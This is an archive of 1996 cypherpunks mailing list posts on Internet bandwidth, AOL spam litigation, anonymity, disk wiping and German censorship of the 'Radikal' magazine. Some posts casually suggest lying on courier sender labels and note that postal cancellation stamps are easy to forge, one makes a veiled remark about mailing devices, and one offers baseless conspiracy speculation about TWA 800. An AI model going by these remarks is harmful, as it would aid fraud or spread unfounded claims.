Always the case. Big deal. Bandwidth is still increasing pretty
fast. There are, naturally, growing pains, but the outages and
bandwidth situation are pretty good, all things considered. Compared
to the way things were eight or nine years ago they are amazing;
compared to four years ago they are still astoundingly better.

Now if we could only go back in time and shoot the folks responsible
for HTTP before they thought of it we might even be able to do
something about the packet loss situation -- if HTTP just played nice
with TCP and Netscape didn't spawn simultaneous TCPs the situation
would be much improved.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Sat, 7 Sep 1996 16:34:25 +0800
To: cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <v02140b01ae56cfd0d26b@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


wb8foz@nrk.com writes:
> > So switch to Fedex.  The P.O. gives lousy service anyway.  Privitize.
> >
>
> Try & mail an anonymous FedEx package.

Just lie on the sender label, isn't that obvious?  I know people who
actually use "codeword" sender labels, in case FedEx or federales ask
about a package they can tell by the sender mentioned which to disavow :)

> Try and pay cash in most Fedex offices.

I always do and as long as I have exact change I have never been
hassled.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sat, 7 Sep 1996 14:11:02 +0800
To: rwright@adnetsol.com (Ross Wright)
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609062352.QAA20226@adnetsol.adnetsol.com>
Message-ID: <199609070316.XAA13685@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text



This is utter horseshit. AOL, like any private individual or organization,
has the right to refuse service to anyone at any time for any reason, or
even for no reason at all. The gubmint isn't doing SQUAT, except forcing
AOL to allow the spammers access.

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
      Hey, Bill Clinton: You suck, and those boys died! I hope you die!
 I feel a groove comin' on             $              Freedom...yeah, right.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Sat, 7 Sep 1996 16:35:38 +0800
To: cypherpunks@toad.com
Subject: Re: Metcalf and Other Net.Fogies
Message-ID: <v02140b02ae56d0cc0dba@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


perry@piermont.com writes:
> Alan Olsen writes:
> > Metcalfe may have a valid prediction here.
>
> Metcalfe is talking out his ass. He's reached the "old geezer who's
> impeding his own field" stage. Many of his articles seem to be written
> as though no one was trying to fix problems.

Well, having talked with people involved with the problems I can assure you
that they are real.  The net brownouts when MAE-East dumps its BGP core or
the fact that when one of the NAPs upgraded to FDDI it soon found that by
the time people had installed the upgrades to the routers the bandwidth was
already saturated should indicate that there are problems.  Most of the
problems are in the routers, even the top of the line Cisco boxes can only
handle so much.  The sky is not falling, but these sorts of problems are
cracking the
whip behind IPv6 and pushing the companies that make the routers pretty hard
(Have you ever tried to buy even a lowly Cisco 2401?  Do you know what the
wait is on delivery?  I really wish I had bought Cisco stock earlier...)

> > When I run traceroutes, the blockage is in MCI or Sprintnet land.
>
> How do you manage to determine where you are losing bandwidth using
> traceroute? That must be a mighty powerful traceroute to do that --
> most traceroutes I've seen are hard pressed just to find out what the
> connectivity path is.

Then you should probably upgrade your traceroute, preferably to one which
allows source routing of the packets and then couple the output to a nice
udp source routing script which will bounce a few packets between links
with slow response times. Most of the problems are at the exchange points
where packets go from one company's network to another.  It seems that users
have the annoying habit of wanting to talk to other people's
customers...imagine the nerve :)

> > The bandwidth to the net has been oversold.
>
> Always the case. Big deal. Bandwidth is still increasing pretty
> fast. There are, naturally, growing pains, but the outages and
> bandwidth situation are pretty good, all things considered. Compared
> to the way things were eight or nine years ago they are amazing;
> compared to four years ago they are still astoundingly better.

Bandwidth may be increasing quickly, but demand for it is increasing even
faster with every moron wanting tose the web while the routers to hook it all
together and make it work are still very expensive and not being produced
fast enough to satisfy the demand.  Compared to the way things were even a
few years ago the aggregate bandwidth that one person can expect is
decreasing, it seems that no one writing internet protocols passed an Intro
to Sociology/Poly Sci course and assumed that the tragedy of the commons did
not apply to them.  The upside of all of this is that it is creating a demand
for value-added services which offer users dedicated bandwidth and faster
response time in return for a little coin.
This will probably push micro-currency on to the net faster than any other
consumer demand...

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sat, 7 Sep 1996 14:25:07 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: Re: Court challenge to AOL junk-mail blocks
Message-ID: <960906233848_279253392@emout14.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-09-06 23:31:06 EDT, rwright@adnetsol.com (Ross Wright)
writes:

<<  Everyone on this list seems to want to limit
 government  intervention EXCEPT when it comes to spam, then every
 one just holds the door open wide and let them in.  If they get that
 inch, they WILL take the whole 9 YARDS!!!!!!  Get a clue, delete or
 killfile those who spam and keep the government out of
 cyberspace!!!!!!
  >>
Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces
of  mail you take LESS than a second to delete them both with the handy
delete key. These people are wasting more time complaining about it than they
will ever do actually deleting it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Sat, 7 Sep 1996 16:42:18 +0800
To: cypherpunks@toad.com
Subject: Re: Court challenge to AOL junk-mail blocks
Message-ID: <v02140b03ae56d6064840@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


frogfarm@yakko.cs.wmich.edu writes:
> This is utter horseshit. AOL, like any private individual or organization,
> has the right to refuse service to anyone at any time for any reason, or
> even for no reason at all. The gubmint isn't doing SQUAT, except forcing
> AOL to allow the spammers access.

AOL has a service agreement with their customers, and they are not allowed
to change the rules just because they feel like it (I believe that this
is called a contract :)  This is the jist of the injunction.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 7 Sep 1996 15:05:44 +0800
To: cypherpunks@toad.com
Subject: Re: Metcalf and Other Net.Fogies
In-Reply-To: <ae545aa807021004884d@[207.167.93.63]>
Message-ID: <wD0uTD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> (Caveat: I'm 44

Like I said - an old fart. :-)

Back from InfoWarCon,

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 7 Sep 1996 15:41:03 +0800
To: cypherpunks@toad.com
Subject: Re: Neo-Nazis etc.
In-Reply-To: <322F9867.7FEF@gte.net>
Message-ID: <cL0uTD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
> Real Nazis are/were bureaucrats; cold, calculating, bureaucratic. Do we
> know anyone like that?

The U.S.Government?
The Usenet Cabal?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sat, 7 Sep 1996 09:18:01 +0800
To: Cypherpunks@toad.com
Subject: No Subject
Message-ID: <199609062151.XAA18867@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On  5 Sep 96 at 14:31, Anonymous wrote:

> This can lead into a long argument about just _when_ violence is
> initiated, where opinion is more important than fact, but IMO:

Agreed, if you live in a world of fantassy....

> Mr. Bell, if he follows through on his scheme, *will* be initiating
> violence.

You urge us not to get into the argument about "just_when_violence is 
initiated" and proceed to state the "Mr. Bell...  ...*will* be 
initiating violence".  What is that english word?  Dogmatic?  Nahhh, 
there must be a more precise one.   Please help me here...


> There are two roads to take in life, convincing and coercing
> others.

Looters of all persuasions have always counted on that and it worked 
for them for thousands of years.

> I worry that abuse of the very young and weak (for
> now) anonymity system for the purpose of initiating, rather than
> exposing, violence will lead to more government violence than we
> already have.

You could worry all you want, but your only way to assess wether or 
not it will happens is not through your feelings but trhough the use 
of your rational mind.  Stop "feeling" and start thinking.

> Perhaps I am wrong and there is no hope; but if so,
> that means another revolution.  Revolutions are very romantic
> sounding, to those who have not been in a war.

I suppose that this refers to AP.  If so, go RTFM because you 
conclusions and the workings of AP are not compatible.  AP would not 
lead to a war, per se.  Neither a civil war.

> I urge everyone to
> read "Emancipating Slaves, Enslaving Free Men" by Jeffrey Rogers
> Hummel for a look at what our last revolution got us (hint: it was
> *not* less government).

I urge you to have a look at what is at the root of the growth of 
govt.  It is not things but ideas, basic premises about life and the 
interaction between individuals.  Ultimately, basic premises about 
the nature of Man is what brought us more govt.

To understand govt excess, you've got to understand what is into the 
brain of the govt peoples.

jfa

"One of theses centuries, the brutes, private or public, who believe 
that they can rule their betters by force, will learn the lesson of 
what happens when brute force encounters mind and force."
                                             - Ragnar Danneskjold :)

Jean-Francois Avon 
 DePompadour, Societe d'Importation Ltee 
   Limoges porcelain, silverware and crystal 
 JFA Technologies, R&D consultants
   physicists, technologists and engineers.
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 7 Sep 1996 17:13:24 +0800
To: "Andrew Loewenstern" <dee@cybercash.com>
Subject: Re: Conservation Laws, Money, Engines, and Ontology (fwd)
Message-ID: <19960907070904453.AAA91@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Fri,  6 Sep 96 14:04:51 -0500, Andrew Loewenstern wrote:


>>  I don't think any one step will solve all our spam problems
>>  but I wouldn't mind spending, say, 5 cents for each real piece
>>  of mail I sent outside my company and if end machines charged
>>  5 cents per piece of ouside mail received, I think spamming
>>  would be crippled.  (Note that with bad guy lists, you could
>>  collect the money and then just throw away the mail.)

>So would you be willing to pay $50.00 for this message you sent to  
>cypherpunks?  If there are a thousand recipients and each one charges $0.05  
>for the priveledge of you sending it e-mail....  It seems like such a scheme  
>would not only cripple spam, but public discussion lists like this one.

It's likely his $.05 would go to the list owner.  When signing up for the list
you would forfeit the right to collect on junk mail.  Charging spammers would
be up to the list...

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 7 Sep 1996 17:23:47 +0800
To: "tcmay@got.net>
Subject: Re: What the NSA is patenting
Message-ID: <19960907071538250.AAA223@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Sep 1996 14:03:43 -0700, Timothy C. May wrote:

>>A maybe usefull program would be a little tsr that constantly
>>overwrite unused sectors of the entire drive with random patterns
>>(maybe seeded with a fast keyboard interval timer).  Like at the very
>>moment I am writing this, my HD has been idle for several minutes...

>The NSA STM method is related to reading _very subtle_ variations in
>magnetic domain modifications. Jitter in read-write head positions can be
>thought of as a noise (N) added to some signal (S)l. Extraction of signals
>in low S/N ration environments is a well-developed science.
>
>Not to start another round of "thermite bomb" posts, but I would not trust
>n-pass erasures.

It's still likely that if you left it running after a month or so it would be
next to impossible to do (assuming the NSA didn't get lucky - you still have to
worry!)

>Of course, this is about the least of my concerns. If the Feds are planning
>to use STM probes on your seized drives, you've got more serious problems.

Such as asking why you didn't use some very strong crypto software?  Work out
some sort of parallel port dongle that could be connected, the software
generates a random key, the parallel port device is written and then removed.
Further access would involve connecting.  The code & chips needed have been
provided in many places; DDJ for one.  Allows a very convincing "Well it was
encrypted and your goon stepped on the key!"

>(The oft-discussed possibility of more secure dongles, or secret decoder
>rings. is still off in the future. Most of us just enter our various
>passwords, and our local disk drives reveal all.)

This is too true.


- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 7 Sep 1996 17:20:15 +0800
To: "Bruce Schneier" <jad@dsddhc.com>
Subject: Re: What the NSA is patenting
Message-ID: <19960907071846671.AAA207@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 06 Sep 1996 11:59:18 -0500, John Deters wrote:

>I hope some hardware hacker who knows their low-level stuff will be able to
>write a secure disk wiper.

They have: it's called a bulk tape eraser. <g>


I'd just store everything sensitive on a floppy. Those are easy to erase with a
heavy duty magnet (not a wimpy refrigerator magnet).  I understand slagging one
in the microwave is also effective <g>.

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 7 Sep 1996 11:37:47 +0800
To: cypherpunks@toad.com
Subject: GAM_lin
Message-ID: <199609070046.AAA03599@pipe1.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-8-96. Wash Tech: 
 
   "Internet Betting Spurs Regulatory Interest." 
 
      A new commission to investigate the nation's $40 
      billion gambling industry will initiate Congress' 
      latest effort to curb the fast-growing gambling 
      industry, and may open up additional efforts to 
      regulate the burgeoning Internet industry. 
 
      Extra legislation is not needed to suppress on-line 
      gambling, said Bernie Horn, National Coalition Against 
      Legalized Gambling. "If the Justice Department wanted 
      to, it could make things unbearable for companies 
      offering on-line gambling from outside the country," 
      he said. 
 
   ----- 
 
   http://jya.com/gamlin.txt  (5 kb) 
 
   GAM_lin 
 
 
   Thanks to BC. 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Sat, 7 Sep 1996 10:17:39 +0800
To: tank@xs4all.nl
Subject: Re: German Government censors dutch site www.xs4all.nl
Message-ID: <199609062255.AAA09827@xs2.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded: a letter by Felipe Rodriquez, Managing Director XS4ALL

Hello,

This is an email I just wrote to Michael Schneider, the guy that
adviced German Internetproviders to censor www.xs4all.nl and
www.serve.com. He will probably forward the text to the 
German Public Prosecutor General, who should also read it.

I try to make them understand that censoring is not very
effective on the Net, and that they should stop it right
now. At the same time I threathen to sue both of them 
for free-speech infringement and damages. We'll see what 
happens. Censoring the Net is _the way_ to make bestsellers, 
when will the governments understand ?



-------------------------------------------------------------------

Hello Michael,


>         http://www.anwalt.de/ictf/p960901e.htm
> 
> It now contains a digest of the complete occasion including parts of the
> letters I wrote to the Public Prosecutor General.

I read it yesterday. Thanks.


> I would appreciate, if you portray the activities of ICTF entirely and 
> exactly.  

I consistently state that the German providers where forced to censor by
the Public Prosecutor. This is also what people understand from the
press-releases we sent. Evenso the entire www.xs4all.nl website
is blocked, with 3100 pages, in order to censor 1 single homepage. 
Regardless who is responsible for the censor-actions, it is an
outrage that 3100 xs4all customers are censored by Germany. Without
a single phonecall, fax, email or letter to Xs4all internet or the
user that placed the Radikal pages on our website. If there are
pages that are not accepted by Germany, then Germany can always
confront us, or the website owner, in a Dutch court of law.


It may interest you to know about some developments:

There are a number of mirrors for the Radikal site. All sorts of people
have spontaneously started to copy the websites to their own system:

    http://burn.ucsd.edu/%7Eats/RADIKAL/ 
    http://www.jca.or.jp/~taratta/mirror/radikal/ 
    http://www.serve.com/~spg/ 
    http://huizen.dds.nl/~radikal 
    http://www.canucksoup.net/radikal/index.html 
    http://www.ecn.org/radikal 
    http://www.well.com/~declan/mirrors/ 
    http://www.connix.com/~harry/radikal/index.htm 
    http://www.ganesa.com/radikal/ 
    http://www.denhaag.org/~radikal 

There are more mirrors than just these, but i did not 
get the entire list. According to the German General 
Prosecutors opinion these sites would also need to be blocked. 
Expect the list of mirrors to grow, and expect to be
forced to block that growing list of sites on the Net.
Realize that a lot of internetusers consider it a 
sport to redistribute censored information. The way
to write a bestseller on the Net is to have it censored
by some government. It has the opposite effect. 

The entire issue 154 of Radikal has been posted in German newsgroup by
anonymous users.

German users can still use remote (non-german) proxy-servers to
access all the Radikal information on Internet. People have 
posted information about these remote proxyservers in German
newsgroups.

Xs4all uses rotating IP-numbers for its services. The IP-numbers
of certain sites and services are changed every couple 
of hours. A static ip-filter would certainly not be enough to
block www.xs4all.nl.

We have asked our parliament and department of Foreign Affairs
to help us fight this blunt German censorship. We have also asked the
EFF, CPSR and EPIC for advice, and to spread our press-release. A fax
was also sent to CNN, Wired, and other press-services.

We have discussed starting legal procedures against Germany and the 
ICTF with our lawyer. If any political and diplomatic actions fail
to stop this act of blunt censorship, then we will most probably
start litigation against the German government and the ICTF, for damages
and violation of the European right on free-speech. It is clear
that censoring 3100 pages, to prevent one of them from being published,
is an infringement of European free-speech legislation. We have
adviced the provider behind www.serve.com, that is also censored, to
engage in the same kind of procedures.

Please inform the German Public Prosecutor General that the censoring
actions have been ineffective, and that Radikal is now on many
different websites and is being distributed widely on the entire
Internet. Continuing to block this growing list of sites would be an
impossible task, what happens if Germany demands to block AOL, EFF,
Compuserve, Prodigy, The Well, Netcom and Demon Internet next week ?
Providers would be forced to block large part of Internet. I don't
think that's what anyone would like to happen.


Kind regards,


        Felipe Rodriquez


--
 Felipe Rodriquez          -  XS4ALL Internet  - finger felipe@xs4all.nl
for 
 http://xs4all.nl/~felipe/ - Managing Director - pub pgp-key 1024/A07C02F9 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 7 Sep 1996 19:01:09 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Propaganda Bit: C
Message-ID: <199609070828.BAA24870@dfw-ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:50 AM 9/6/96 -0800, Jim Bell wrote:
>Since red liquid running in the streets is generally so reviled, one of the 
>things which mystifies me is why there aren't more simulation-type programs 
>used to test out hypotheticals, for example a "SimEconomy."   For example, 

As someone else pointed out recently, this depends _so_ strongly on
the assumptions built into your model, both explicit and implicit.
SimHealth, for instance, was a propaganda piece put out for the last election
so people could play with different approaches to managing other peoples'
health care.  If Duncan were to write something like that, anybody who
tinkered with the economy would make it go downhill. If Ross Perot wrote it,
anybody who started making the deficit larger would find his picture at the
bottom of the screen having the ears grow larger.  I assume that if
Jim wrote it, anybody who did anything to the economy other than
decrease government involvement would find a bunch of nasty little dwarves
throwing stone knives at them....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Sat, 7 Sep 1996 04:03:33 +0800
To: cypherpunks@toad.com
Subject: Re: Voluntary Disclosure of True Names
In-Reply-To: <199609051749.KAA12335@netcom20.netcom.com>
Message-ID: <199609061342.BAA24447@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 05 Sep 96 10:49:39 -0700, "Vladimir Z. Nuri"
<vznuri@netcom.com> wrote:

   I have seen it repeated here often that somehow anonymity is some kind
   of a "right" that one should have in all kinds of different & important
   transactions, not merely on "cyberspace debate societies". I see
   here frequently the implication that *private*entities* that want to
   enforce identity in their own transactions are somehow implementing
   a corrupt, orwellian system. it sounded to me like that was all
   Dyson was advocating.

The only time I've ever seen this point of view expressed on the list
is when you and the other tentacles claim someone else is wrong for
saying it (which they didn't, of course).

No one has ever said "private entities" shouldn't be allowed to
"enforce identity in their own transactions."  This is exactly what
Tim and others have been saying _should_ happen.  Dyson, however,
appears to be advocating some sort of identity tracking mechanism at
the network level so that _all_ transactions are identifiable (albeit
with some legal mechanism attempting to prevent "unauthorised"
identification) regardless of whether the individuals involved want to
enforce identity or not.  Identification can be proved between the
individuals concerned on a truly voluntary basis, without any such
controls on the net.

   also, I think you are being slightly disingenuous in masking your own
   and other cpunks major objections to traceability, with the above,
   "this is all we really want". what about situations
   where the government requires you to give a physical identity for
   some kind of a license etc? do you think there are no such valid
   situations? is there any role for a government whatsoever in 
   CryptoAnarchist Utopia and if so, is there any situation in which
   demanding physical identity is reasonable?

If the government, or any other entity, requires identification it can
be provided.  I'm hard pressed to think of a situation in which the
legitimate business of government (if any) actually requires
identification.  What do we need government to licence?

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Paradise is exactly like where you are right now ... only much, much
better.
		-- Laurie Anderson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Sat, 7 Sep 1996 11:36:52 +0800
To: tcmay@got.net.cypherpunks@toad.com
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
Message-ID: <199609070035.CAA06972@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


>A Modest Proposal:
>
>* as Germany is bent on blocking sites which carry this subversive
>pamphlet, "Radikal," let us mirror it on thousands of sites around the
>world.
>
>* when the Germans went into Danmark and insisted Jews wear badges,
>ordinary citizens (and the Danish Royal Family, as I recall) also took to
>wearing these Star of David badges.

Add this plug to signatures and web pages:

-----------------------------------------------------------------------
Lebt und lest radikal! http://www.xs4all.nl/~tank/radikal/
-----------------------------------------------------------------------

Then, your messages are "promoting a terrorist organization"
(cf. http://www.anwalt.de/ictf/p960901e.htm) and may no longer
be carried in Germany.

[It just says to live radically, and to read "radikal". But
"radikal" is a terrorist magazine after all.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf Moeller)
Date: Sat, 7 Sep 1996 14:26:59 +0800
To: moe-san@stadt.com
Subject: Re: ... subversive leftists
In-Reply-To: <32302DD6.43D3@stadt.com>
Message-ID: <m0uzED3-00009tC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


>"description and tolerating/praising of a terroristic act", describing
>the 
>sabotage of a public railroad-line by using means of inflammables and 
>reprogramming railroad-signs. They also used some
>"explosive-warning"-signs 
>in order to simulate a possible positioned bomb.

Uh? Their sabotage "tutorial" is very careful about not causing
danger to humans. Where did you see any "explosive-warning" signs?

As long as there is no English translation available, please be exact
when posting excerpts.

Publishing texts doesn't destroy any railway signals. Some people
do; and IMHO everyone must have the right to inform themselves
how stupid those people are.

BTW, people say that there are much better descriptions of the
railway system in the legal literature which of course could be
used by saboteurs as well.


ObCypherpunks: The "Radikal" staff encrypted their data with the
export version of PCSECURE which uses 32 bit keys. All files have
been decrypted by the BSI. Now they are using PGP.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Sat, 7 Sep 1996 20:03:44 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: Tack of Internet censorship
In-Reply-To: <199609051526.RAA18328@basement.replay.com>
Message-ID: <Pine.BSI.3.91.960907055826.22456A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 5 Sep 1996, Anonymous wrote:

> What I am proposing is that Apache or other WWW servers
> have a way to allow access to site B's URL at site A,
> similar to the old trick of finger user@sitea.com@siteb.com.
> 
> Implementation should be simple.  However, I wonder what
> is a good standard way to specify this in the URL or
> a site.

Three words:  Proxy Web Server    :)

-Millie
"I'm nobody -- oh, you're nobody too -- shh, don't tell anybody, they'd
 (kill us) you know!"

sfuze@tiac.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Sat, 7 Sep 1996 20:19:04 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: 16oz packages
In-Reply-To: <199609061201.IAA04873@nrk.com>
Message-ID: <Pine.BSI.3.91.960907060416.22456B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



Ah, but we all know, now, how to send a package with a miscellaneous 
device in it -- return address is the company.  

And we certainly know how to do likewise if we ever want to do anything 
postal.

But I make peace.

-Millie
sfuze@tiac.net


On Fri, 6 Sep 1996, David Lesher wrote:

> 
> > One is now instructed to take these packages to a post-office mail 
> > clerk for mailing.
> > 
> > (Of course it's unclear just what would be done if a package 
> > weighing over that magical 16ozs was left in a mailbox)
> 
> They get sent back.
> 
> Was in line @ USPS. Guy showed up with 40-odd Priority Mail
> Packages that had come back. Clerk stamped each one & off they went.
> 
> 1) It was obvious from conversation the customer was a local.
> 
> 2) The hand cancel stamp is TRIVIAL to forge. After all, until now,
> who has WANTED to falsely zero-out the value of her stamps?
> 
> 
> -- 
> A host is a host from coast to coast.................wb8foz@nrk.com
> & no one will talk to a host that's close........[v].(301) 56-LINUX
> Unless the host (that isn't close).........................pob 1433
> is busy, hung or dead....................................20915-1433
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Sat, 7 Sep 1996 20:38:09 +0800
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: TWA 800 - Friendly Fire?
In-Reply-To: <199609062048.NAA32689@abraham.cs.berkeley.edu>
Message-ID: <Pine.BSI.3.91.960907061725.22456D-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



The one thing I have been thinking about, since the very beginning, is -- 
am I the only person who feels this might have been somewhat less than 
unintentional?  It sure would be easy to take those rights away if 
everyone is afraid for their "lives"...

Look at what has been happening in the news lately -- and look at how 
much is "unexplained" or flimsy evidencially speaking, in the very least.
If, for instance, the government wanted to cut down on civil 
liberties/civil rights, it would seem MIGHTY CONVENIENT that so much is 
"accidentally" happening so close together.

Ditto with the Olympics thing.

I vote something is QUITE fishy, and I guess I hope I'm not the only one 
paranoid enough to feel the same.

-Millie
sfuze@tiac.net

"What we have here is a FAILURE to COMMUNICATE" (some song)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 8 Sep 1996 15:12:08 +0800
To: cypherpunks@toad.com
Subject: Teledesic, the censored internet in the sky.
Message-ID: <199609080445.VAA00370@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Teledesic, the censored internet in the sky.

Late last year the organized violence monopolies of the world 
voted to give Bill Gates 400 Megahertz of bandwidth, at the same 
frequency in each monopoly.  I would guesstimate the value of this 
grant to be around ten billion dollars.  

Don't run out and buy Microsoft shares.  When I said Bill Gates, 
I meant Bill Gates.  I did not mean Microsoft.

Bill Gates intends to build an internet in the sky, eight hundred 
satellites in low earth orbit, each of them with big bandwidth 
connections to its nearest neighbors, and each with a four hundred 
megahertz connection to each of many squares of ground underneath it.

What caused the collected killers of the world to show such unanimous
generosity towards Bill Gates?

Bill Gates proposed a network that would be completely censorable.

He will not sell pipes to his space backbone, he will sell pipes
from a particular rectangle on the ground to its space backbone.

You would buy a right to connect from any place in a single small
area, not any a right to connect from any place in the world, 
and Bill Gates would only sell such rights to government 
approved organizations, which would then presumably resell connections
to private individuals -- connections that would first run through
government controlled pipes to check for politically incorrect bits
before they reached Bill Gates' sky backbone.

Of course we should not condemn him too harshly for this:  He needs
approval from Singapore, Iran, France, Germany, Communist China, and 
the like, in order to get a single uniform world wide frequency band, 
and would be unlikely to get it for any reasonable proposal.

The government pipes in his proposal are as useless as wheels on
a fish, because he promises his ground stations will be quite 
cheap.

Therefore private citizens who are not permitted direct access
to his internet in the sky will feel the impact of tyranny
immediately in their wallets.

Bill Gates internet in the sky will provide short and near
constant latency, therefore telephone connections running
through it should be pretty good, whereas existing internet
phone sucks mightily.

Teledesic is promised to come on line in 2001, though we have
seen how Microsoft meets schedules in the past.  I conjecture 
2006.  I also predict that once the scheme is securely
in place, and jamming it becomes painful, Bill Gates
will find a thousand ways to chisel the government monopoly 
middlemen in his proposal.

I would guess that Motorola's less ambitious Iridium project
will only be a year or two late, but it has little potential
to revolutionize the world the way Bill Gates proposal has.

I expect once the scheme is in place, the government monopolies
in Gate's plan will be under attack both from above and from below.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Sat, 7 Sep 1996 20:35:40 +0800
To: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Cellular phone tracing
